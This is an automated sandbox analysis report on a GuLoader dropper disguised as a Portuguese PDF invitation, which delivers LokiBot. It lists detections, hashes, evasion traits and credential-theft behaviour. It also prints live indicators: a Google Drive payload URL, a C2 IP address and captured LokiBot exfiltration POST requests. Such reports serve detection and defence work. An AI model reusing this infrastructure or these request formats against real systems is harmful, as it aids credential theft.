Windows Analysis Report Anexo I e II do convite#U00b7pdf.exe

Overview

General Information

Sample Name: Anexo I e II do convite#U00b7pdf.exe
Analysis ID: 531208
MD5: e779a8be256d298c6d96884724d7792b
SHA1: 5ff1cb154e5001791e3dd019721462fe20bfec80
SHA256: 9dbfeb5b6cdf7f40899f2f36ecd59d8c1f72ec680248e4b42f69496c61b5d19c

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Potential malicious icon found
Multi AV Scanner detection for submitted file
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Creates processes with suspicious names
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Found malware configuration
Source: 0000000D.00000000.338047511.0000000000560000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id="}
Multi AV Scanner detection for submitted file
Source: Anexo I e II do convite#U00b7pdf.exe Virustotal: Detection: 29%
Machine Learning detection for sample
Source: Anexo I e II do convite#U00b7pdf.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 13.0.Anexo I e II do convite#U00b7pdf.exe.400000.1.unpack Avira: Label: TR/Dropper.VB.Gen
Source: 13.0.Anexo I e II do convite#U00b7pdf.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen
Source: 13.0.Anexo I e II do convite#U00b7pdf.exe.400000.3.unpack Avira: Label: TR/Dropper.VB.Gen
Source: 0.0.Anexo I e II do convite#U00b7pdf.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen
Source: 13.0.Anexo I e II do convite#U00b7pdf.exe.400000.2.unpack Avira: Label: TR/Dropper.VB.Gen
Source: 0.2.Anexo I e II do convite#U00b7pdf.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen

Compliance:

Uses 32bit PE files
Source: Anexo I e II do convite#U00b7pdf.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 216.58.209.46:443 -> 192.168.2.3:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.208.129:443 -> 192.168.2.3:49747 version: TLS 1.2

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49748 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49748 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49748 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49748 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49749 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49749 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49749 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49749 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49752 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49752 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49752 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49752 -> 63.250.34.171:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://drive.google.com/uc?export=download&id=
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: NAMECHEAP-NETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 63.250.34.171
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1woW1V-Fwjjb6G5mIgMHVwoyywXrCNcHQ HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
  Host: drive.google.com
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/iol8p470gcqqh0o2bl4lp5jq2phtn0nr/1638282825000/17938877548982121299/*/1woW1V-Fwjjb6G5mIgMHVwoyywXrCNcHQ?e=download HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
  Cache-Control: no-cache
  Host: doc-0g-14-docs.googleusercontent.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /tickets.php?id=156 HTTP/1.0
  User-Agent: Mozilla/4.08 (Charon; Inferno)
  Host: 63.250.34.171
  Accept: */*
  Content-Type: application/octet-stream
  Content-Encoding: binary
  Content-Key: 413CA904
  Content-Length: 190
  Connection: close
Source: global traffic HTTP traffic detected: POST /tickets.php?id=156 HTTP/1.0
  User-Agent: Mozilla/4.08 (Charon; Inferno)
  Host: 63.250.34.171
  Accept: */*
  Content-Type: application/octet-stream
  Content-Encoding: binary
  Content-Key: 413CA904
  Content-Length: 163
  Connection: close
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden
  Date: Tue, 30 Nov 2021 14:34:02 GMT
  Server: Apache/2.4.38 (Debian)
  Content-Length: 287
  Connection: close
  Content-Type: text/html; charset=UTF-8
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden
  Date: Tue, 30 Nov 2021 14:34:05 GMT
  Server: Apache/2.4.38 (Debian)
  Content-Length: 287
  Connection: close
  Content-Type: text/html; charset=UTF-8
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden
  Date: Tue, 30 Nov 2021 14:34:09 GMT
  Server: Apache/2.4.38 (Debian)
  Content-Length: 287
  Connection: close
  Content-Type: text/html; charset=UTF-8
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: Anexo I e II do convite#U00b7pdf.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Anexo I e II do convite#U00b7pdf.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.392422082.0000000000932000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.394429524.000000000092A000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419336698.0000000000920000.00000004.00000020.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.422738792.000000001E5CC000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.392139154.0000000000936000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Anexo I e II do convite#U00b7pdf.exe String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: Anexo I e II do convite#U00b7pdf.exe String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: Anexo I e II do convite#U00b7pdf.exe String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Anexo I e II do convite#U00b7pdf.exe String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: Anexo I e II do convite#U00b7pdf.exe String found in binary or memory: http://ocsp.digicert.com0C
Source: Anexo I e II do convite#U00b7pdf.exe String found in binary or memory: http://ocsp.digicert.com0O
Source: Anexo I e II do convite#U00b7pdf.exe String found in binary or memory: http://www.digicert.com/CPS0
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.392422082.0000000000932000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.392139154.0000000000936000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.392422082.0000000000932000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.392139154.0000000000936000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.392422082.0000000000932000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.394429524.000000000092A000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419336698.0000000000920000.00000004.00000020.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.422738792.000000001E5CC000.00000004.00000001.sdmp String found in binary or memory: https://doc-0g-14-docs.googleusercontent.com/
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.392139154.0000000000936000.00000004.00000001.sdmp String found in binary or memory: https://doc-0g-14-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/iol8p470
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419287204.00000000008C7000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419287204.00000000008C7000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/i
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419267340.0000000000810000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1woW1V-Fwjjb6G5mIgMHVwoyywXrCNcHQ
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.392422082.0000000000932000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1woW1V-Fwjjb6G5mIgMHVwoyywXrCNcHQhb_RBrBtzpisGKe78
Source: Anexo I e II do convite#U00b7pdf.exe String found in binary or memory: https://www.digicert.com/CPS0
Source: unknown HTTP traffic detected: POST /tickets.php?id=156 HTTP/1.0
  User-Agent: Mozilla/4.08 (Charon; Inferno)
  Host: 63.250.34.171
  Accept: */*
  Content-Type: application/octet-stream
  Content-Encoding: binary
  Content-Key: 413CA904
  Content-Length: 190
  Connection: close
Source: unknown DNS traffic detected: queries for: drive.google.com

System Summary:

Potential malicious icon found
Source: initial sample Icon embedded in PE file: bad icon match: 20047c7c70f0e004
Detected potential crypto function
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A942C NtAllocateVirtualMemory, 0_2_020A942C
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020ADAD0 NtWriteVirtualMemory, 0_2_020ADAD0
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020AE9C2 NtProtectVirtualMemory, 0_2_020AE9C2
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A820F NtWriteVirtualMemory, 0_2_020A820F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A826F NtWriteVirtualMemory, 0_2_020A826F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A82FB NtWriteVirtualMemory, 0_2_020A82FB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A835F NtWriteVirtualMemory, 0_2_020A835F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A4364 NtWriteVirtualMemory, 0_2_020A4364
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A83CB NtWriteVirtualMemory, 0_2_020A83CB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020AD02E NtWriteVirtualMemory, 0_2_020AD02E
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A8067 NtWriteVirtualMemory, 0_2_020A8067
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A70A8 NtWriteVirtualMemory, 0_2_020A70A8
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A80BB NtWriteVirtualMemory, 0_2_020A80BB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A8130 NtWriteVirtualMemory, 0_2_020A8130
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A81BB NtWriteVirtualMemory, 0_2_020A81BB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A961B NtAllocateVirtualMemory, 0_2_020A961B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A9635 NtAllocateVirtualMemory, 0_2_020A9635
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A7643 NtWriteVirtualMemory, 0_2_020A7643
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020AB645 NtWriteVirtualMemory, 0_2_020AB645
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A8663 NtWriteVirtualMemory, 0_2_020A8663
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A76B3 NtWriteVirtualMemory, 0_2_020A76B3
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A96CB NtAllocateVirtualMemory, 0_2_020A96CB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A86E3 NtWriteVirtualMemory, 0_2_020A86E3
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A7723 NtWriteVirtualMemory, 0_2_020A7723
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A9747 NtAllocateVirtualMemory, 0_2_020A9747
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A8753 NtWriteVirtualMemory, 0_2_020A8753
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A77B8 NtWriteVirtualMemory, 0_2_020A77B8
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020AF7D5 NtWriteVirtualMemory, 0_2_020AF7D5
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A945F NtAllocateVirtualMemory, 0_2_020A945F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A8463 NtWriteVirtualMemory, 0_2_020A8463
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A0494 NtWriteVirtualMemory,LoadLibraryA, 0_2_020A0494
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A94C3 NtAllocateVirtualMemory, 0_2_020A94C3
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A84FB NtWriteVirtualMemory, 0_2_020A84FB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A9523 NtAllocateVirtualMemory, 0_2_020A9523
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A8547 NtWriteVirtualMemory, 0_2_020A8547
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A7552 NtWriteVirtualMemory, 0_2_020A7552
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A9593 NtAllocateVirtualMemory, 0_2_020A9593
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A95BD NtAllocateVirtualMemory, 0_2_020A95BD
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A85CB NtWriteVirtualMemory, 0_2_020A85CB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A7A6F NtWriteVirtualMemory, 0_2_020A7A6F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020AEA7F NtProtectVirtualMemory, 0_2_020AEA7F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A7AE7 NtWriteVirtualMemory, 0_2_020A7AE7
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A7BA3 NtWriteVirtualMemory, 0_2_020A7BA3
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A7807 NtWriteVirtualMemory, 0_2_020A7807
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A788B NtWriteVirtualMemory, 0_2_020A788B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A790F NtWriteVirtualMemory, 0_2_020A790F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A796E NtWriteVirtualMemory, 0_2_020A796E
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A7963 NtWriteVirtualMemory, 0_2_020A7963
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A7974 NtWriteVirtualMemory, 0_2_020A7974
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A79FB NtWriteVirtualMemory, 0_2_020A79FB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020AEE11 NtProtectVirtualMemory, 0_2_020AEE11
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A7E6F NtWriteVirtualMemory, 0_2_020A7E6F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A7EE3 NtWriteVirtualMemory, 0_2_020A7EE3
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A7F5B NtWriteVirtualMemory, 0_2_020A7F5B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A7C2F NtWriteVirtualMemory, 0_2_020A7C2F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A7C9B NtWriteVirtualMemory, 0_2_020A7C9B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A7D13 NtWriteVirtualMemory, 0_2_020A7D13
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A7D73 NtWriteVirtualMemory, 0_2_020A7D73
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_020A7DEB NtWriteVirtualMemory, 0_2_020A7DEB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 13_2_0056FBF7 LdrInitializeThunk,NtProtectVirtualMemory, 13_2_0056FBF7
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 13_2_0056FD81 Sleep,LdrInitializeThunk,NtProtectVirtualMemory, 13_2_0056FD81
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 13_2_0056FE33 NtProtectVirtualMemory, 13_2_0056FE33
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 13_2_0056FC2B LdrInitializeThunk,NtProtectVirtualMemory, 13_2_0056FC2B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 13_2_0056FBF1 LdrInitializeThunk,NtProtectVirtualMemory, 13_2_0056FBF1
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 13_2_0056FB82 LdrInitializeThunk,NtProtectVirtualMemory, 13_2_0056FB82
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 13_2_0056FBAF LdrInitializeThunk,NtProtectVirtualMemory, 13_2_0056FBAF
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 13_2_0056FCAF NtProtectVirtualMemory, 13_2_0056FCAF
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Process Stats: CPU usage > 98%
Sample file is different than original file name gathered from version info
Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.338762831.000000000041C000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameForm_reduc.exe vs Anexo I e II do convite#U00b7pdf.exe
Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339931590.0000000002A90000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameForm_reduc.exeFE2X vs Anexo I e II do convite#U00b7pdf.exe
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000000.336777031.000000000041C000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameForm_reduc.exe vs Anexo I e II do convite#U00b7pdf.exe
Source: Anexo I e II do convite#U00b7pdf.exe Binary or memory string: OriginalFilenameForm_reduc.exe vs Anexo I e II do convite#U00b7pdf.exe
PE file contains strange resources
Source: Anexo I e II do convite#U00b7pdf.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
PE / OLE file has an invalid certificate
Source: Anexo I e II do convite#U00b7pdf.exe Static PE information: invalid certificate
Source: Anexo I e II do convite#U00b7pdf.exe Virustotal: Detection: 29%
Source: Anexo I e II do convite#U00b7pdf.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: unknown Process created: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe "C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe"
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Process created: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe "C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe"
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Process created: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe "C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe"
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto
Source: classification engine Classification label: mal100.rans.troj.spyw.evad.winEXE@3/2@2/3
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 0000000D.00000000.338047511.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_00402640 push 0040130Eh; ret 0_2_00402653
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_00402654 push 0040130Eh; ret 0_2_00402667
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_00402668 push 0040130Eh; ret 0_2_0040267B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_0040267C push 0040130Eh; ret 0_2_0040268F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_00402604 push 0040130Eh; ret 0_2_00402617
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_00402618 push 0040130Eh; ret 0_2_0040262B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_0040262C push 0040130Eh; ret 0_2_0040263F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_004026CC push 0040130Eh; ret 0_2_004026DF
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_004026E0 push 0040130Eh; ret 0_2_004026F3
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_004026F4 push 0040130Eh; ret 0_2_00402707
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_00402690 push 0040130Eh; ret 0_2_004026A3
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_004026A4 push 0040130Eh; ret 0_2_004026B7
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_004026B8 push 0040130Eh; ret 0_2_004026CB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_00402744 push 0040130Eh; ret 0_2_00402757
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_00402758 push 0040130Eh; ret 0_2_0040276B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_00404B67 push ds; ret 0_2_00404B68
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_0040276C push 0040130Eh; ret 0_2_0040277F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_00403D73 push esp; iretd 0_2_00403D74
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe Code function: 0_2_00402708 push 0040130Eh; ret 0_2_0040271B
